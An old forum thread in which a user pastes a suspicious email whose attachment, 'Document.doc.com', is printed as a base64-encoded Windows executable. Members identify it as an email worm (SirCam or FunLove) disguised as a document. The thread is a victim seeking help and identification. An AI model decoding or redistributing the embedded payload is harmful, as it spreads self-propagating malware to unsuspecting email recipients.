|
-
Nov 7th, 2001, 10:26 AM
#1
Thread Starter
Dazed Member
Urgent. Please Help!
Ok i got your attention. I just recieved a
virus in my email and this has never happened
to me before. The web address is unfamiliar to me.
Is there anyway that i can trace where it originated from?
And i was able to view the contents of
the file using an option hotmail provides.
Does this look like compiled source code to you?
I havent a clue. Thanks all.
From [email protected] Wed, 07 Nov 2001 04:39:28 -0800
Received: from [12.26.191.39] by hotmail.com (3.2) with ESMTP id MHotMailBDB276640034400437230C1ABF270E7E0; Wed, 07 Nov 2001 04:39:09 -0800
Received: from node5 (210.212.157.254) by mail_server with SMTP; Wed, 7 Nov 2001 07:38:49 -0800
From: "sachet"<[email protected]>
To: [email protected]
Subject: Document
date: Wed, 7 Nov 2001 18:07:30 +0530
MIME-Version: 1.0
X-MIMEOLE: Produced By Microsoft MimeOLE V5.50.4133.2400
X-Mailer: Microsoft Outlook Express 5.50.4133.2400
Content-Type: multipart/mixed; boundary="----3647B4BD_Outlook_Express_message_boundary"
Content-Disposition: Multipart message
------3647B4BD_Outlook_Express_message_boundary
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: message text
Hi! How are you=3F
I send you this file in order to have your advice
See you later=2E Thanks
------3647B4BD_Outlook_Express_message_boundary
Content-Type: application/mixed; name=Document.doc.com
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename=Document.doc.com
TVpQAAIAAAAEAA8A//8AALgAAAAAAAAAQAAaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAEAALoQAA4ftAnNIbgBTM0hkJBUaGlzIHByb2dyYW0gbXVzdCBiZSBydW4gdW5k
ZXIgV2luMzINCiQ3AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAVVBFAABMAQgAGV5CKgAA
AAAAAAAA4ACOgQsBAhkAqAEAAGwAAAAAAACkqQEAABAAAADAAQAAAEAAABAAAAACAAABAAAA
AAAAAAQAAAAAAAAAAMACAAAEAAAAAAAAAgAAAAAAEAAAQAAAAAAQAAAQAAAAAAAAEAAAAAAA
AAAAAAAAAPABAK4RAAAAYAIAABgAAAAAAAAAAAAAAAAAAAAAAAAAMAIAOCAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAgAgAYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAQ09ERQAAAACQpwEAABAAAACoAQAABAAAAAAAAAAAAAAAAAAA
IAAA4ERBVEEAAAAAlBwAAADAAQAAHgAAAKwBAAAAAAAAAAAAAAAAAEAAAMBCU1MAAAAAACUP
AAAA4AEAAAAAAADKAQAAAAAAAAAAAAAAAAAAAADALmlkYXRhAACuEQAAAPABAAASAAAAygEA
AAAAAAAAAAAAAAAAQAAAwC50bHMAAAAADAAAAAAQAgAAAAAAANwBAAAAAAAAAAAAAAAAAAAA
AMAucmRhdGEAABgAAAAAIAIAAAIAAADcAQAAAAAAAAAAAAAAAABAAABQLnJlbG9jAAA4IAAA
ADACAAAiAAAA3gEAAAAAAAAAAAAAAAAAQAAAUC5yc3JjAAAAAGAAAABgAgAAMAAAAAACAAAA
AAAAAAAAAAAAAEAAAMwAAAAAAAAAAAAAAAAAgAIAAAAAAAAYAgAAAAAAAAAAAAAAAABAAABQ
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQQ
QAAKBlN0cmluZ1gQQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAWBBAAAQAAAAAAAAA
oCxAAKwsQACwLEAAtCxAAKgsQABwK0AAhCtAAMwrQAAHVE9iamVjdGQQQAAHB1RPYmplY3RY
EEAAAAAAAAAABlN5c3RlbQAAhBBAAA8ISVVua25vd24AAAAAAQAAAAAAAAAAwAAAAAAAAEYG
U3lzdGVtAAD/JbjxQQCLwP8ltPFBAIvA/yWw8UEAi8D/JazxQQCLwP8lqPFBAIvA/yWk8UEA
i8D/JaDxQQCLwP8lnPFBAIvA/yWY8UEAi8D/JZTxQQCLwP8lkPFBAIvA/yWM8UEAi8D/JYjx
QQCLwP8lzPFBAIvA/yWE8UEAi8D/JcjxQQCLwP8lgPFBAIvA/yV88UEAi8D/JXjxQQCLwP8l
dPFBAIvA/yVw8UEAi8D/JWzxQQCLwP8laPFBAIvA/yVk8UEAi8D/JWDxQQCLwP8lXPFBAIvA
/yVY8UEAi8D/JVTxQQCLwP8lxPFBAIvA/yVQ8UEAi8D/JUzxQQCLwP8lSPFBAIvA/yVE8UEA
i8D/JdzxQQCLwP8l2PFBAIvA/yXU8UEAi8D/JUDxQQCLwP8lPPFBAIvA/yX88UEAi8D/Jfjx
QQCLwP8l9PFBAIvA/yXw8UEAi8D/JezxQQCLwP8l6PFBAIvA/yXk8UEAi8BTg8S8uwoAAABU
6FH////2RCQsAXQFD7dcJDCLw4PERFvDi8D/JTjxQQCLwP8lNPFBAIvA/yUw8UEAi8D/JSzx
QQCLwP8lKPFBAIvA/yUk8UEAi8D/JSDxQQCLwP8lHPFBAIvAU1a+TORBAIM+AHU6aEQGAABq
AOio////i8iFyXUFM8BeW8OhSORBAIkBiQ1I5EEAM9KLwgPAjUTBBIseiRiJBkKD+mR17IsG
ixCJFl5bw5CJAIlABMOLwFNWi/KL2Oid////hcB1BTPAXlvDixaJUAiLVgSJUAyLE4kQiVgE
iUIEiQOwAV5bw4tQBIsIiQqJUQSLFUzkQQCJEKNM5EEAw1NWV1VRi/GJFCSL6ItdAIsEJIsQ
iRaLUASJVgSLO4tDCIvQA1MMOxZ1FIvD6Lf///+LQwiJBotDDAFGBOsWixYDVgQ7wnUNi8Po
mv///4tDDAFGBIvfO+t1wovWi8XoVf///4TAdQQzwIkGWl1fXlvDjUAAU1ZXVYPE+IvYi/uL
MotDCDvwcmyLzgNKBIvoA2sMO813XjvwdRuLQgQBQwiLQgQpQwyDewwAdUSLw+g1////6zuL
CotyBAPOi/gDeww7z3UFKXMM6yaLCgNKBIkMJCv5iXwkBIsSK9CJUwyL1IvD6ND+//+EwHUE
M8DrDLAB6wiLGzv7dYUzwFlaXV9eW8OQU1ZXi9qL8IH+AAAQAH0HvgAAEADrDIHG//8AAIHm
AAD//4lzBGoBaAAgAABWagDo+P3//4v4iTuF/3Qji9O4UORBAOhs/v//hMB1E2gAgAAAagCL
A1Do2f3//zPAiQNfXlvDkFNWV1WL2Yvyi+jHQwQAABAAagRoACAAAGgAABAAVeil/f//i/iJ
O4X/dR+Bxv//AACB5gAA//+JcwRqBGgAIAAAVlXogP3//4kDgzsAdCOL07hQ5EEA6PX9//+E
------3647B4BD_Outlook_Express_message_boundary
-
Nov 7th, 2001, 10:32 AM
#2
PowerPoster
There's not a great deal you can do about
Just be thankful it didn't infect you
-
Nov 7th, 2001, 10:55 AM
#3
Thread Starter
Dazed Member
What is all that crap though.
Is it source code?
-
Nov 7th, 2001, 11:06 AM
#4
PowerPoster
must be
Ascii representation of assembler perhaps
-
Nov 7th, 2001, 06:29 PM
#5
Lively Member
That's just a simple com executable{attachment} disguised as a doc document.
The purpose of the executable is to propagate by sending itself to several others in your contacts list.
I have received them several times in the past few months, but never opened them.
Marriage - is not a word, but a sentence.
-
Nov 7th, 2001, 06:46 PM
#6
Member
The body sounds familiar, like a SirCam or something.
-
Nov 7th, 2001, 07:03 PM
#7
Thread Starter
Dazed Member
So the text is really nothing since it is actualy a .doc? Woud that be right? How could i get to the underlying program and coud i decompile it? Thanks
-
Nov 7th, 2001, 07:09 PM
#8
Lively Member
It's not a doc...delete it !!!
Marriage - is not a word, but a sentence.
-
Nov 8th, 2001, 03:37 AM
#9
Retired VBF Adm1nistrator
Microsoft MVP : Visual Developer - Visual Basic [2004-2005]
-
Nov 8th, 2001, 10:32 AM
#10
Thread Starter
Dazed Member
It's W32/FunLove.gen Virus.
-
Nov 8th, 2001, 10:39 AM
#11
Thread Starter
Dazed Member
Heres the information on this virus incase anyone happens to
get it.
http://vil.mcafee.com/dispVirus.asp?virus_k=10419&
-
Nov 9th, 2001, 04:16 AM
#12
Retired VBF Adm1nistrator
No thats the sircam virus.
Microsoft MVP : Visual Developer - Visual Basic [2004-2005]
-
Nov 9th, 2001, 11:09 AM
#13
Thread Starter
Dazed Member
Not acording to McAffee's site.
-
Nov 9th, 2001, 12:19 PM
#14
Retired VBF Adm1nistrator
How many times do I have to say this... the body of that message is the sircam virus, and the way the attachment is named also indicates sircam.
If mcaffee call it otherwise, then they're wrong.
Microsoft MVP : Visual Developer - Visual Basic [2004-2005]
-
Nov 9th, 2001, 02:18 PM
#15
Thread Starter
Dazed Member
No need to get your feathers in a ruffle. Im just saying what they say. I could care less what the name is or what type of virus it is.
-
Nov 12th, 2001, 05:09 AM
#16
Retired VBF Adm1nistrator
Originally posted by chrisjk
no offense Jamie, but I think mcafee know more about viri that you do
Yeah they probably do, but I remember distinctly that virus.
I had to take it out of two infected sites, and its a pain in the hole.
http://vil.nai.com/vil/virusSummary.asp?virus_k=99141
[edit]
This is the funlove virus :
http://vil.nai.com/vil/virusSummary.asp?virus_k=10419
[/edit]
Microsoft MVP : Visual Developer - Visual Basic [2004-2005]
Posting Permissions
- You may not post new threads
- You may not post replies
- You may not post attachments
- You may not edit your posts
-
Forum Rules
|
Click Here to Expand Forum to Full Width
|